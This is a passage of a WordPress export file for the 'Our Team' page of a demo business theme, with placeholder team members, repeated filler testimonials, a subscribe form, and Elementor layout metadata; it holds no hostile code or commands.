									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team5.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team5-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Mary Flynn</h6>				CHIEF TECHNOLOGY OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team6.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team6-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Adam Oswald</h6>				CHIEF MARKETING OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team7.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team7.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team7-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Kate Green</h6>				CHIEF FINANCIAL OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team8.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team8.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team8-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Harry Septem</h6>				co-founder of company			
	        our benefits	        <h3>Entrust Your Project to  Our Specialists</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
										<img width="959" height="650" src="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg 959w, https://maxbizz.s3.amazonaws.com/images/image1-team-300x203.jpg 300w, https://maxbizz.s3.amazonaws.com/images/image1-team-768x521.jpg 768w" sizes="(max-width: 959px) 100vw, 959px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="http://wpdemo.archiwp.com/maxbizz/wp-content/themes/maxbizz/images/avatar-1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>690</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"c0972f9","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"a497b47","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"851ebdc","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5cea06f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"3c8329c","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"d1c3196","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"e34f121","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"051be26","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"4dda4d5","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7893ae6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2bcb443","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c6f2cd2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3045fbb","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"05a209e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2585422","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"3f0bea3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"659956f","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}]},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"b1c7f19","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"419a6b1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"65aaf12","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team5.jpg","id":694},"member_name":"Mary Flynn","member_extra":"CHIEF TECHNOLOGY OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"2b58641","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"23fa50d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team6.jpg","id":695},"member_name":"Adam Oswald","member_extra":"CHIEF MARKETING OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"42171b0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1c6c26d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team7.jpg","id":696},"member_name":"Kate Green","member_extra":"CHIEF FINANCIAL OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"23f0a2f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"df675fc","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team8.jpg","id":697},"member_name":"Harry Septem","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}]},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"b3c9551","elType":"section","settings":{"layout":"full_width","gap":"no","content_position":"middle","structure":"20"},"elements":[{"id":"cfc4ff2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"background_background":"classic","background_color":"#262832","_inline_size_tablet":100},"elements":[{"id":"6f8488f","elType":"section","settings":{"content_width":{"unit":"px","size":525,"sizes":[]},"css_classes":"mr_0","padding":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"padding_tablet":{"unit":"%","top":"10","right":"20","bottom":"10","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"4e25f9a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a001cee","elType":"widget","settings":{"sub":"our benefits","title":"Entrust Your Project to  Our Specialists","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"header_size":"h3","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"6a5318a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","text_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0ba065e","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"1df2f14","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"24c3ac5","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"bg_color":"#3B3D48","title_color":"#FFFFFF","per_bg":"#3B3D48"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"337cb49","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d6d5985","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-team.jpg","id":699},"image_size":"full","_margin_mobile":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a9b5cf2","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"275","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"190","left":"0","isLinked":false}},"elements":[{"id":"4e2afe0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"78c7db3","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e4b3144","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"7e32710","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"5aa0738","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"bf1cbf3","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"d1cccc6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"398c80a","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true","dots_spacing":{"unit":"px","size":-50,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-40,"sizes":[]}},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"15c47ef","elType":"section","settings":{"content_width":{"unit":"px","size":1340,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"237daa6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7a438e9","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#FF8F3E","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"8bfca9a","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"eadf1a3","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"4b7dca5","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"25c8dd0","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1506]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:22;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:22;s:19:"_inline_size_tablet";i:18;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:14:"padding_mobile";i:1;s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:2:{s:14:"subtitle_style";i:3;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:4:{s:6:"layout";i:5;s:3:"gap";i:4;s:13:"content_width";i:2;s:16:"content_position";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:8:{s:7:"padding";i:7;s:14:"padding_mobile";i:5;s:11:"css_classes";i:1;s:14:"